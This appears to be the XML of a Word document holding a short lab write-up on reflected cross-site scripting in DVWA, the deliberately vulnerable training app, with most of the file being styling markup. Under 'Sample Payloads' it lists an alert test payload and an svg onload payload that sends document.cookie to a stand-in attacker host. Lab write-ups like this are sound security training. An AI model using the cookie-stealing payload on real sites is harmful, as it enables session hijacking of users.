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D84E" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t># Cross-Site Scripting (XSS) Exploitation – DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A138F" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6"/>
    <w:p w14:paraId="161D2C18" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>## Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783151B5" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>This section documents the exploitation of Cross-Site Scripting (XSS) vulnerabilities in DVWA at high security level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1718876A" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6"/>
    <w:p w14:paraId="230FAE53" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>The objective was to inject malicious JavaScript payloads to demonstrate session hijacking and cookie theft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F5E33" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6"/>
    <w:p w14:paraId="1BED9F46" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>## Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0604049E" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>- Burp Suite (for payload injection and interception)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331E01D" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>- Custom payloads crafted manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F93A7" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6"/>
    <w:p w14:paraId="52801C59" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>## Techniques Applied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC6265" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>- Reflected XSS via form input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E76AED" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t xml:space="preserve">- Cookie theft using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="46FDBC58" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>- Redirect to attacker-controlled server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2F694B" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6"/>
    <w:p w14:paraId="28E71640" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>## Sample Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444D4AF9" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>- `&lt;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=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'XSS Exploited')"&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442155C" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRPr="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4BD6">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>- `&lt;svg onload="document.location='http://attacker.com?cookie='+document.cookie"&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A61A2" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRPr="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C05D52" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>## Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C8C19F" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>Screenshots of successful XSS execution and cookie exfiltration are stored in the `/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>screenshots`</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB8B864" w14:textId="77777777" w:rsidR="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6"/>
    <w:p w14:paraId="771AFEAC" w14:textId="0F86C70C" w:rsidR="00FC7786" w:rsidRPr="000F4BD6" w:rsidRDefault="000F4BD6" w:rsidP="000F4BD6">
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC7786" w:rsidRPr="000F4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67"/>
    <w:rsid w:val="0000453D"/>
    <w:rsid w:val="0001341E"/>
    <w:rsid w:val="000F2BC8"/>
    <w:rsid w:val="000F4BD6"/>
    <w:rsid w:val="001234E7"/>
    <w:rsid w:val="00133794"/>
    <w:rsid w:val="00211B6D"/>
    <w:rsid w:val="00235961"/>
    <w:rsid w:val="0024661D"/>
    <w:rsid w:val="002874A8"/>
    <w:rsid w:val="002A776A"/>
    <w:rsid w:val="003444ED"/>
    <w:rsid w:val="00506C4F"/>
    <w:rsid w:val="00577A04"/>
    <w:rsid w:val="00583FC9"/>
    <w:rsid w:val="00681994"/>
    <w:rsid w:val="006B0612"/>
    <w:rsid w:val="007733AA"/>
    <w:rsid w:val="0079369C"/>
    <w:rsid w:val="007B3538"/>
    <w:rsid w:val="007C5EA1"/>
    <w:rsid w:val="00812B67"/>
    <w:rsid w:val="0083611A"/>
    <w:rsid w:val="00862280"/>
    <w:rsid w:val="0087078F"/>
    <w:rsid w:val="008B53F4"/>
    <w:rsid w:val="008F51A3"/>
    <w:rsid w:val="009007A4"/>
    <w:rsid w:val="009804CD"/>
    <w:rsid w:val="009D7DBE"/>
    <w:rsid w:val="009F3485"/>
    <w:rsid w:val="00A97547"/>
    <w:rsid w:val="00AC10C6"/>
    <w:rsid w:val="00AE228D"/>
    <w:rsid w:val="00AF2325"/>
    <w:rsid w:val="00B96191"/>
    <w:rsid w:val="00BE78B3"/>
    <w:rsid w:val="00DD287F"/>
    <w:rsid w:val="00E02576"/>
    <w:rsid w:val="00E31E45"/>
    <w:rsid w:val="00E42F8F"/>
    <w:rsid w:val="00E440F6"/>
    <w:rsid w:val="00EA5381"/>
    <w:rsid w:val="00EB6A23"/>
    <w:rsid w:val="00F43FF6"/>
    <w:rsid w:val="00F57A59"/>
    <w:rsid w:val="00FC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909E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{61221BD2-28E8-4C37-BDFD-0F0D49F4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7A4"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto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1E45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40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53F4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1B6D"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b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B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B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3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31E4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11B6D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B67"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF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B67"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="B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67"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6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67"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6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67"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"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67"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/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12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B6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B67"/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812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B67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812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B67"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz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812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CHYE YAN TONG</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>CHYE YAN TONG</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-28T18:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-28T18:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>